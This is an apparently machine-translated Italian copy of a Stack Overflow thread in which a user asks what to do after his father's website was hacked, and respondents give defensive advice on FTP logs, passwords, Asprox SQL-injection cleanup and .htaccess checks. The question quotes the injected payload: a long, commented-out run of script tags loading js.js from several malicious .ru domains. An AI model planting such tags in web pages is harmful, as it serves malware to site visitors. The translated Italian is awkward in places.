Il mio sito ha violato..Cosa devo fare?[chiuso]
https://stackoverflow.com/questions/2970
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianDomanda
Mio padre mi ha chiamato oggi e ha detto la gente di andare al suo sito web sono ottenere 168 virus cercando di scaricare nel computer.Egli non è tecnico, e costruito il tutto con un editor WYSIWYG.
Ho spuntato il suo sito è aperto e vista la fonte, e non c'era una riga di codice Javascript comprende a fondo l'origine di destra, prima della chiusura del tag HTML.Sono inclusi in questo file (tra molti altri): http://www.98hs.ru/js.js <-- DISATTIVARE JAVASCRIPT PRIMA DI ANDARE A QUELL'URL.
Così ho commentato per ora.Si scopre la sua password FTP è un semplice dizionario parola di sei lettere lunghe, per cui si pensa che è stato attaccato.Abbiamo modificato la password di un 8+ cifra che non è una parola stringa (non sarebbe andato a fare una passphrase, poiché egli è un caccia-n-peck typer).
Ho fatto un il whois sul 98hs.ru e che è ospitato da un server in Cile.In realtà, c'è un indirizzo di posta elettronica associato con esso troppo, ma ho seri dubbi che questa persona è il colpevole.Probabilmente solo qualche altro sito che ha violato...
Non ho idea di cosa fare, a questo punto, anche se, come non ho mai affrontato questo genere di cose prima.Qualcuno ha qualche suggerimento?
Stava usando plain jane onu-ftp protetto attraverso webhost4life.com.Non ho nemmeno vedere un modo per fare sftp sul loro sito.Sto pensando che il suo nome utente e la password ha intercettato?
Così, per rendere questo più rilevanti per la comunità, quali sono i passi che si dovrebbero prendere/migliori pratiche da seguire per proteggere il vostro sito web ottenere hacked?
Per la cronaca, qui è la riga di codice che "magicamente" ha aggiunto al suo file (e non è nel suo file sul suo computer -- ho lasciato commentato solo per fare assoluta certezza che non farà nulla di questa pagina, anche se sono sicuro che Jeff sarebbe in guardia contro questo):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Soluzione
Cercare e raccogliere quante più informazioni possibile.Vedere se l'host è in grado di dare un log che mostra tutte le connessioni FTP che sono state apportate al tuo account.È possibile utilizzare quelli per vedere se era anche una connessione FTP che è stato utilizzato per effettuare la modifica e, eventualmente, ottenere un indirizzo IP.
Se si utilizza un software preimballato come Wordpress, Drupal, o qualsiasi altra cosa che non hai il codice non può essere vulnerabilità nel codice di upload che permette questo tipo di modifica.Se è stato creato su misura, doppio controllo di tutti i posti in cui si consente agli utenti di caricare file o modificare quelli esistenti.
La seconda cosa sarebbe fare un dump del sito e controllare tutto ciò che per le altre modifiche.Essa può essere solo una singola modifica l'hanno fatta, ma se hanno ottenuto in via FTP chissà cos'altro c'è.
Ripristinare il vostro sito su un noto stato buono e, se necessario, eseguire l'aggiornamento alla versione più recente.
C'è un livello di rendimento che si devono prendere in considerazione anche.È il danno vale la pena cercando di rintracciare la persona giù o si tratta di qualcosa in cui si vive e basta, di imparare ad usare le password più sicure?
Altri suggerimenti
So che questo è un po ' tardi nel gioco, ma l'URL indicato per il JavaScript è menzionato in un elenco di siti che hanno fatto parte del ASPRox bot ripresa avviata nel mese di giugno (almeno quando siamo arrivati contrassegnati con esso).Alcuni dettagli su di esso sono di seguito indicate:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
La cosa brutta di questo è che efficacemente ogni tipo varchar campo del database è "infetto" per sputare fuori un riferimento a questo URL, in cui il browser ottiene un piccolo iframe che si trasforma in un bot.Un SQL di base per risolvere questo problema, può essere trovato qui:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
La cosa spaventosa è che il virus sembra per le tabelle di sistema per valori di infettare e un sacco di piani di hosting condiviso anche condividere il database di spazio per i loro clienti.Quindi, molto probabilmente non era nemmeno il papà del sito che è stato infettato, ma di qualcun altro sito all'interno del suo hosting cluster che ha scritto alcuni poveri codice e apre la porta all'attacco di SQL Injection.
Se non l'ha fatto ancora, mi piacerebbe inviare URGENTE mail a loro ospite e dare loro un link al codice SQL per risolvere l'intero sistema.È possibile risolvere i propri affetti tabelle del database, ma è più probabile che i bot che stanno facendo l'infezione sta andando a passare attraverso quel buco di nuovo e di infettare l'intero lotto.
Spero che questo ti dà qualche info in più per lavorare con.
EDIT:Uno più veloce di pensiero, se si sta usando uno dei padroni di casa online strumenti di progettazione per la costruzione del suo sito web, il contenuto è probabilmente seduto in una colonna ed è stato infettato in quel modo.
Si menziona che il tuo Papà è stato utilizzando un sito web strumento di pubblicazione.
Se lo strumento di pubblicazione, pubblica dal suo computer al server, potrebbe essere il caso che il suo file locali sono puliti, e che ha solo bisogno di ripubblicare il server.
Si dovrebbe vedere se c'è un diverso metodo di accesso al proprio server di FTP semplice, anche se...che non è molto sicura, in quanto si invia la propria password come testo in chiaro su internet.
Con sei caratteri word password, egli potrebbe essere stato bruta forzato.Che è più probabile che il suo ftp di essere intercettati, ma potrebbe essere anche questo.
Iniziare con una più password.(8 caratteri è ancora abbastanza debole)
Vedi se questo link per internet sicurezza sul blog è utile.
Il sito è semplicemente in HTML statico?cioèegli non è riuscito a codice stesso una pagina di caricamento che consente a chiunque di guida da caricare compromesso scripts/pagine?
Perché non chiedere webhost4life se hanno i log FTP disponibili e segnalare il problema a loro.Non si sa mai, essi possono essere molto ricettivi e scoprire esattamente che cosa è successo?
Io lavoro per una condivisa hoster e siamo sempre i benvenuti rapporti come questi e di solito può individuare l'esatta vettore di attacco base e consigli su come e dove il cliente è andato storto.
Scollegare il webserver senza spegnere per evitare gli script di arresto.Analizzare il disco rigido tramite un altro computer come un disco dati e vedere se è possibile determinare il colpevole attraverso i file di log e le cose di quella natura.Verificare che il codice è sicuro e poi ripristinare da un backup.
Questo è accaduto ad un mio cliente che di recente che è stato ospitato su impianto elettrico.Non sono sicuro se il vostro ambiente di hosting è stato Apache, ma se era da essere sicuri di controllare .file htaccess che non è stato creato, in particolare al di sopra di webroot e all'interno della directory di immagini, in quanto tendono ad iniettare un po ' di cattiveria lì (erano reindirizzando le persone a seconda di dove sono venuti nel fare riferimento).Anche controllare qualsiasi che hai fatto per creare il codice che hai fatto non scrivere.
Ci fosse stato violato dagli stessi ragazzi a quanto pare!O bot, nel nostro caso.Hanno usato SQL injection URL su qualche vecchio classico ASP, siti che nessuno mantenere più.Abbiamo trovato attaccare e gli indirizzi ip bloccati in IIS.Ora dobbiamo effettuare il refactoring del vecchio ASP.Quindi, il mio consiglio è di dare un'occhiata al log IIS primo luogo, per trovare se il problema è nel codice del sito o la configurazione del server.
